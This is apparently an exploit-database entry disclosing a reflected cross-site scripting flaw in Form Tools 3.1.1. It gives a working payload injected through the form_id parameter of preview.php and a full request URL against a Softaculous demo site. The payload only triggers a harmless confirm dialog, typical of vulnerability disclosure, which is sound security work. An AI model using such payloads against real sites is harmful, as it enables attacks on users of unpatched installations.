Share
## https://sploitus.com/exploit?id=1337DAY-ID-39220
# Exploit Title: Form Tools Version: 3.1.1 - Reflected XSS
# Exploit Author: tmrswrr
# Vendor Homepage: https://formtools.org/
# Version: 3.1.1
# Tested on: https://www.softaculous.com/demos/Form_Tools
1 ) Write after form_id your payload : https://demos2.softaculous.com/Form_Toolsdswyuy0rdr/modules/form_builder/preview.php?form_id=2
Payload : "><sVg/onLy=1 onLoaD=confirm(1)//
2 ) You will bee alert button : https://demos2.softaculous.com/Form_Toolsdswyuy0rdr/modules/form_builder/preview.php?form_id=2%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//